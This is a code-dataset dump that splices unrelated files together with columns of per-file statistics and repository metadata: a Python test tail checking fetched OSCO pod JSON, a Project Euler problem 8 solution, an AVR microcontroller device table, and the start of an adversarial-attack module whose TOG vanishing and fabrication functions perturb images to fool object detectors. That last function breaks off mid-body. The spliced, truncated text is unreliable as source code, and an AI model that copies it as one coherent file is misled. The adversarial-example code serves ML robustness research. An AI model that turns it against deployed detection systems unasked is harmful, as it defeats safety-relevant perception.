retval = tgt.execute()
assert retval == TaskOutcome.SUCCESS
assert len(os.listdir(str(tmpdir))) == 2
f_expected = pathlib.Path('tests/data/tasks/osco/output-fetcher/') / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.444-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
f_expected = pathlib.Path('tests/data/tasks/osco/output-fetcher/') / 'ssg-ocp4-ds-cis-111.222.333.555-pod.json'
f_produced = tmpdir / 'ssg-ocp4-ds-cis-111.222.333.555-pod.json'
assert [row for row in open(f_produced)] == [row for row in open(f_expected)]
| 43.132353
| 125
| 0.708234
| 1,653
| 11,732
| 4.913491
| 0.101633
| 0.042847
| 0.078552
| 0.054174
| 0.852992
| 0.828244
| 0.811253
| 0.81113
| 0.805836
| 0.805836
| 0
| 0.023179
| 0.150528
| 11,732
| 271
| 126
| 43.291513
| 0.791792
| 0.109274
| 0
| 0.827907
| 0
| 0.009302
| 0.22233
| 0.153444
| 0
| 0
| 0
| 0
| 0.195349
| 1
| 0.088372
| false
| 0
| 0.032558
| 0
| 0.12093
| 0.009302
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
32261daacf218acb14e24363b9259887badbf398
| 1,640
|
py
|
Python
|
python/p008.py
|
lucaschen321/project-euler-solutions
|
721a1d6a82c082cc24197fec2500118848ee8433
|
[
"MIT"
] | null | null | null |
python/p008.py
|
lucaschen321/project-euler-solutions
|
721a1d6a82c082cc24197fec2500118848ee8433
|
[
"MIT"
] | null | null | null |
python/p008.py
|
lucaschen321/project-euler-solutions
|
721a1d6a82c082cc24197fec2500118848ee8433
|
[
"MIT"
] | null | null | null |
#
# Solution to Project Euler Problem 8
# by Lucas Chen
#
# Answer: 23514624000
#
DIGITS = 13
NUM = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
# Loops through each substring in [NUM] of length [DIGITS], and finds the
# substring whose [DIGITS] adjacent digits have the greatest product. Returns
# the value of this product.
def compute():
ans, product = 1, 1
for i in range(len(NUM) - DIGITS): # loops through all substrings
for j in range(DIGITS): # computes the digit product
product *= int(NUM[i+j])
if product > ans:
ans = product
product = 1
return ans
if __name__ == "__main__":
print(compute())
| 60.740741
| 1,008
| 0.854878
| 87
| 1,640
| 16.022989
| 0.597701
| 0.017217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.695622
| 0.108537
| 1,640
| 26
| 1,009
| 63.076923
| 0.257866
| 0.182927
| 0
| 0
| 0
| 0
| 0.759036
| 0.753012
| 0
| 1
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0
| 0
| 0.153846
| 0.076923
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c93ebd3810e581754093870d0105e6afe7ac76d
| 21,481
|
py
|
Python
|
devices.py
|
mvirkkunen/dwprog
|
c9458c4b8273e6bc8805a0a47b82fc185281c1b9
|
[
"MIT"
] | 14
|
2017-03-01T02:26:11.000Z
|
2021-06-08T21:45:39.000Z
|
devices.py
|
nerdralph/dwprog
|
468f703eb8b8ab335e3e45836fc77212214611cd
|
[
"MIT"
] | 4
|
2018-03-30T14:36:27.000Z
|
2018-04-21T04:03:54.000Z
|
devices.py
|
nerdralph/dwprog
|
468f703eb8b8ab335e3e45836fc77212214611cd
|
[
"MIT"
] | 2
|
2018-04-20T22:11:46.000Z
|
2018-08-23T03:31:05.000Z
|
# Generated with generatedevices.py
class Device:
def __init__(self, **kwargs):
for key in kwargs:
setattr(self, key, kwargs[key])
devices = [
Device(devid="at90can128", name="AT90CAN128", signature=0x978103f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90can32", name="AT90CAN32", signature=0x958103f, flash_size=0x8000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90can64", name="AT90CAN64", signature=0x968103f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm1", name="AT90PWM1", signature=0x9383, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm161", name="AT90PWM161", signature=0x948b, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm216", name="AT90PWM216", signature=0x9483, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm2b", name="AT90PWM2B", signature=0x9383, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm316", name="AT90PWM316", signature=0x9483, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm3b", name="AT90PWM3B", signature=0x9383, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90pwm81", name="AT90PWM81", signature=0x9388, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90usb1286", name="AT90USB1286", signature=0x978203f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90usb1287", name="AT90USB1287", signature=0x978203f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90usb162", name="AT90USB162", signature=0x9482, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="at90usb646", name="AT90USB646", signature=0x968203f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90usb647", name="AT90USB647", signature=0x968203f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="at90usb82", name="AT90USB82", signature=0x9682, flash_size=0x2000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="atmega128", name="ATmega128", signature=0x970203f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x48),
Device(devid="atmega1280", name="ATmega1280", signature=0x970303f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega1281", name="ATmega1281", signature=0x970403f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega1284", name="ATmega1284", signature=0x970503f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega1284p", name="ATmega1284P", signature=0x970503f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega1284rfr2", name="ATmega1284RFR2", signature=0xa70303f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega128a", name="ATmega128A", signature=0x970203f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x48),
Device(devid="atmega128rfa1", name="ATmega128RFA1", signature=0xa70103f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega128rfr2", name="ATmega128RFR2", signature=0xa70203f, flash_size=0x20000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16", name="ATmega16", signature=0x940303f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega162", name="ATmega162", signature=0x940403f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega164a", name="ATmega164A", signature=0x940a03f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega164p", name="ATmega164P", signature=0x940a03f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega164pa", name="ATmega164PA", signature=0x940a03f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega165a", name="ATmega165A", signature=0x940703f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega165p", name="ATmega165P", signature=0x940703f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega165pa", name="ATmega165PA", signature=0x940703f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega168", name="ATmega168", signature=0x9406, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega168a", name="ATmega168A", signature=0x940b, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega168p", name="ATmega168P", signature=0x940b, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega168pa", name="ATmega168PA", signature=0x940b, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega168pb", name="ATmega168PB", signature=0x9415, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega169a", name="ATmega169A", signature=0x940503f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega169p", name="ATmega169P", signature=0x940503f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega169pa", name="ATmega169PA", signature=0x940503f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16a", name="ATmega16A", signature=0x940303f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16hva", name="ATmega16HVA", signature=0x940c, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16hvb", name="ATmega16HVB", signature=0x940d, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16hvbrevb", name="ATmega16HVBrevB", signature=0x940d, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16m1", name="ATmega16M1", signature=0x9484, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega16u2", name="ATmega16U2", signature=0x9489, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="atmega16u4", name="ATmega16U4", signature=0x948803f, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega2560", name="ATmega2560", signature=0x980103f, flash_size=0x40000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega2561", name="ATmega2561", signature=0x980203f, flash_size=0x40000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega2564rfr2", name="ATmega2564RFR2", signature=0xa80303f, flash_size=0x40000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega256rfr2", name="ATmega256RFR2", signature=0xa80203f, flash_size=0x40000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32", name="ATmega32", signature=0x950203f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega324a", name="ATmega324A", signature=0x951103f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega324p", name="ATmega324P", signature=0x950803f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega324pa", name="ATmega324PA", signature=0x951103f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega324pb", name="ATmega324PB", signature=0x951703f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega325", name="ATmega325", signature=0x950503f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3250", name="ATmega3250", signature=0x950603f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3250a", name="ATmega3250A", signature=0x950e03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3250p", name="ATmega3250P", signature=0x950e03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3250pa", name="ATmega3250PA", signature=0x950e03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega325a", name="ATmega325A", signature=0x950d03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega325p", name="ATmega325P", signature=0x950d03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega325pa", name="ATmega325PA", signature=0x950d03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega328", name="ATmega328", signature=0x950f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega328p", name="ATmega328P", signature=0x950f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega328pb", name="ATmega328PB", signature=0x9516, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega329", name="ATmega329", signature=0x950303f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3290", name="ATmega3290", signature=0x950403f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3290a", name="ATmega3290A", signature=0x950c03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3290p", name="ATmega3290P", signature=0x950c03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega3290pa", name="ATmega3290PA", signature=0x950c03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega329a", name="ATmega329A", signature=0x950b03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega329p", name="ATmega329P", signature=0x950b03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega329pa", name="ATmega329PA", signature=0x950b03f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32a", name="ATmega32A", signature=0x950203f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32c1", name="ATmega32C1", signature=0x9586, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32hvb", name="ATmega32HVB", signature=0x9510, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32hvbrevb", name="ATmega32HVBrevB", signature=0x9510, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32m1", name="ATmega32M1", signature=0x9584, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega32u2", name="ATmega32U2", signature=0x958a, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="atmega32u4", name="ATmega32U4", signature=0x958703f, flash_size=0x8000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega406", name="ATmega406", signature=0x950703f, flash_size=0xa000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega48", name="ATmega48", signature=0x9205, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega48a", name="ATmega48A", signature=0x920a, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega48p", name="ATmega48P", signature=0x920a, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega48pa", name="ATmega48PA", signature=0x920a, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega48pb", name="ATmega48PB", signature=0x9210, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega64", name="ATmega64", signature=0x960203f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x48),
Device(devid="atmega640", name="ATmega640", signature=0x960803f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega644", name="ATmega644", signature=0x960903f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega644a", name="ATmega644A", signature=0x960a03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega644p", name="ATmega644P", signature=0x960a03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega644pa", name="ATmega644PA", signature=0x960a03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega644rfr2", name="ATmega644RFR2", signature=0xa60303f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega645", name="ATmega645", signature=0x960503f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6450", name="ATmega6450", signature=0x960603f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6450a", name="ATmega6450A", signature=0x960e03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6450p", name="ATmega6450P", signature=0x960e03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega645a", name="ATmega645A", signature=0x960d03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega645p", name="ATmega645P", signature=0x960d03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega649", name="ATmega649", signature=0x960303f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6490", name="ATmega6490", signature=0x960403f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6490a", name="ATmega6490A", signature=0x960c03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6490p", name="ATmega6490P", signature=0x960c03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega649a", name="ATmega649A", signature=0x960b03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega649p", name="ATmega649P", signature=0x960b03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega64a", name="ATmega64A", signature=0x960203f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x48),
Device(devid="atmega64c1", name="ATmega64C1", signature=0x9686, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega64hve2", name="ATmega64HVE2", signature=0x9610, flash_size=0x10000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega64m1", name="ATmega64M1", signature=0x9684, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega64rfr2", name="ATmega64RFR2", signature=0xa60203f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega88", name="ATmega88", signature=0x930a, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega88a", name="ATmega88A", signature=0x930f, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega88p", name="ATmega88P", signature=0x930f, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega88pa", name="ATmega88PA", signature=0x930f, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega88pb", name="ATmega88PB", signature=0x9316, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega8hva", name="ATmega8HVA", signature=0x9310, flash_size=0x2000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega8u2", name="ATmega8U2", signature=0x9389, flash_size=0x2000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="attiny13", name="ATtiny13", signature=0x9007, flash_size=0x400, flash_pagesize=0x20, reg_dwdr=0x2e, reg_spmcsr=0x37),
Device(devid="attiny13a", name="ATtiny13A", signature=0x9007, flash_size=0x400, flash_pagesize=0x20, reg_dwdr=0x2e, reg_spmcsr=0x37),
Device(devid="attiny1634", name="ATtiny1634", signature=0x9412, flash_size=0x4000, flash_pagesize=0x20, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny167", name="ATtiny167", signature=0x9487, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="attiny2313", name="ATtiny2313", signature=0x910a, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny2313a", name="ATtiny2313A", signature=0x910a, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny24", name="ATtiny24", signature=0x910b, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny24a", name="ATtiny24A", signature=0x910b, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny25", name="ATtiny25", signature=0x9108, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=0x22, reg_spmcsr=0x37),
Device(devid="attiny261", name="ATtiny261", signature=0x910c, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny261a", name="ATtiny261A", signature=0x910c, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny4313", name="ATtiny4313", signature=0x920d, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny43u", name="ATtiny43U", signature=0x920c, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny44", name="ATtiny44", signature=0x9207, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny441", name="ATtiny441", signature=0x9215, flash_size=0x1000, flash_pagesize=0x10, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny44a", name="ATtiny44A", signature=0x9207, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny45", name="ATtiny45", signature=0x9206, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=0x22, reg_spmcsr=0x37),
Device(devid="attiny461", name="ATtiny461", signature=0x9208, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny461a", name="ATtiny461A", signature=0x9208, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny48", name="ATtiny48", signature=0x9209, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny828", name="ATtiny828", signature=0x9314, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny84", name="ATtiny84", signature=0x930c, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny841", name="ATtiny841", signature=0x9315, flash_size=0x2000, flash_pagesize=0x10, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny84a", name="ATtiny84A", signature=0x930c, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny85", name="ATtiny85", signature=0x930b, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=0x22, reg_spmcsr=0x37),
Device(devid="attiny861", name="ATtiny861", signature=0x930d, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny861a", name="ATtiny861A", signature=0x930d, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny87", name="ATtiny87", signature=0x9387, flash_size=0x2000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="attiny88", name="ATtiny88", signature=0x9311, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
]
| 135.100629
| 153
| 0.781947
| 2,851
| 21,481
| 5.681165
| 0.103472
| 0.101192
| 0.11638
| 0.16892
| 0.70618
| 0.701488
| 0.701488
| 0.701488
| 0.693709
| 0.693709
| 0
| 0.17847
| 0.078441
| 21,481
| 158
| 154
| 135.955696
| 0.639725
| 0.001536
| 0
| 0
| 1
| 0
| 0.138487
| 0
| 0
| 0
| 0.156812
| 0
| 0
| 1
| 0.006452
| false
| 0
| 0
| 0
| 0.012903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8fa170fdfe52be30079acc73869283ac93c53386
| 2,444
|
py
|
Python
|
tog/attacks.py
|
thomastjk/advdouble
|
1dd16af48e6cc3bcf9f38e2ac4a5abc58a4b1758
|
[
"MIT"
] | 1
|
2021-08-01T06:35:01.000Z
|
2021-08-01T06:35:01.000Z
|
tog/attacks.py
|
thomastjk/advdouble
|
1dd16af48e6cc3bcf9f38e2ac4a5abc58a4b1758
|
[
"MIT"
] | null | null | null |
tog/attacks.py
|
thomastjk/advdouble
|
1dd16af48e6cc3bcf9f38e2ac4a5abc58a4b1758
|
[
"MIT"
] | null | null | null |
from attack_utils.target_utils import generate_attack_targets
import numpy as np
def tog_vanishing(victim, x_query, n_iter=10, eps=8/255., eps_iter=2/255.):
eta = np.random.uniform(-eps, eps, size=x_query.shape)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
for _ in range(n_iter):
grad = victim.compute_object_vanishing_gradient(x_adv)
signed_grad = np.sign(grad)
x_adv -= eps_iter * signed_grad
eta = np.clip(x_adv - x_query, -eps, eps)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
return x_adv
def tog_fabrication(victim, x_query, n_iter=10, eps=8/255., eps_iter=2/255.):
eta = np.random.uniform(-eps, eps, size=x_query.shape)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
for _ in range(n_iter):
grad = victim.compute_object_fabrication_gradient(x_adv)
signed_grad = np.sign(grad)
